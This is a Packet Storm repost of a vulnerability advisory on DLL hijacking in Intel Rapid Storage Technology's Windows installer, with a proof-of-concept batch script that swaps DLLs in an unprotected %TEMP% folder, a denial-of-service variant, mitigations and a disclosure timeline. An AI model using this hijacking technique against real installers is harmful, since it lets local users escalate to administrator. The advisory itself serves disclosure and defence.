what you don't know can hurt you

Intel Rapid Storage Technology User Interface And Driver DLL Hijacking

Intel Rapid Storage Technology User Interface And Driver DLL Hijacking
Posted Nov 16, 2018
Authored by Stefan Kanthak

Intel Rapid Storage Technology User Interface and Driver version suffers from a dll hijacking vulnerability.

tags | exploit
systems | windows
MD5 | 588da88e53e05773cd51de3eafe1fcb5

Intel Rapid Storage Technology User Interface And Driver DLL Hijacking

Change Mirror Download
Hi @ll,

the executable installer of the
Intel(r) Rapid Storage Technology (Intel(r) RST) User Interface and Driver,
version (LATEST for Windows 7), released 11/14/2017, available
from <https://downloadmirror.intel.com/27400/eng/SetupRST.exe> via
is (SURPRISE!) vulnerable!

CVSS score: 7.5/HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

See Intel's security advisory SA-00153

Vulnerability #1:

Although running with ELEVATED (administrative) privileges
(the "application manifest" embedded in SetupRST.exe specifies
"requireAdministrator"), on STANDARD installations of Windows,
i.e. where the user account created during Windows setup is used,
the executable installer creates an UNPROTECTED subdirectory
IIF<abcd>.tmp in the user's %TEMP% directory.

For this well-known and well-documented vulnerability see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html> plus

The subdirectory IIF<abcd>.tmp inherits the NTFS ACLs from its
parent %TEMP%, allowing "full access" for the unprivileged
(owning) user, who can replace/overwrite the DLLs


later loaded and executed by the installer between their creation
and use.
Since these DLLs are executed with administrative privileges, this
vulnerability results in arbitrary code execution WITH escalation
of privilege.

NOTE: the precondition "user account created during Windows setup"
is met on typical installations of Windows: according to
Microsoft's own security intelligence reports, about 1/2 to
3/4 of the about 600 million Windows installations which send
telemetry data have only ONE active user account.

Demonstration/proof of concept:

1. visit <https://skanthak.homepage.t-online.de/sentinel.html>,
then download
and save it in an arbitrary directory;

2. save the following batch script in the same directory:

--- IIF.CMD ---
@If Not Exist "%TEMP%\IIF????.tmp" Goto :WAIT
For /D %%! In ("%TEMP%\IIF????.tmp") Do Set IIFTMP=%%!
Copy /Y SENTINEL.DLL "%IIFTMP%\Resource.dll"
For /R "%IIFTMP%" %%! In (IntelCommon.dll) Do Copy /Y SENTINEL.DLL "%%!"
--- EOF ---

3. start the batch script per double-click;

4. execute SetupRST.exe: notice the message boxes displayed from
the replaced DLLs.


1. ALWAYS specify a PROPER "security descriptor" when you create
(temporary) files or directories in potentially unsafe (i.e.
user-writable) paths like the %TEMP% directory!
See <https://msdn.microsoft.com/en-us/library/aa363855.aspx>
and use the second parameter of CreateDirectory() to properly
restrict the permissions when running elevated!

2. NEVER load resource(-only) DLLs for execution!
See <https://msdn.microsoft.com/en-us/library/ms684179.aspx>
and use the third parameter of LoadLibraryEx() to specify


1. DONT use executable installers; stay far away from such
eternally vulnerable crap!

2. NEVER run executable installers in unsafe environments,
especially NEVER from UNSAFE directories like "%TEMP%\" or

3. DISABLE execution of files (via NTFS ACL, as shown below) in
the systems and every users %TEMP% and every %USERPROFILE%
(see <https://skanthak.homepage.t-online.de/SAFER.html>)!

4. Practice STRICT privilege separation: use a your privileged
"Administrator" account (especially the account created during
Windows setup) ONLY for administrative tasks, and COMPLETELY
separate unprivileged user accounts, with elevation requests
DISABLED, for your everyday/regular work.

Vulnerability #2:

A variant of #1, resulting in denial of service.

Demonstration/proof of concept:

1. add the NTFS access control list entry (D;OIIO;WP;;;WD) meaning
"deny execution of files in this directory for everyone,
inheritable to all subdirectories" to the (user's) %TEMP%

NOTE: this does NOT need administrative privileges!

2. execute SetupRST.exe: notice the message box
"error loading language resource" displayed.


Create (temporary) files and directories with PROPER permissions!
See above.

stay tuned
Stefan Kanthak


2018-06-06 vulnerability report sent to vendor

2018-06-10 Intel acknowledges receipt

2018-06-14 Intel confirms reported vulnerability

2018-10-26 CVE-2018-3635 assigned

2018-11-13 Intel publishes security advisory SA-00153

2018-11-16 vulnerability report published


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    4 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2019 Packet Storm. All rights reserved.

Security Services
Hosting By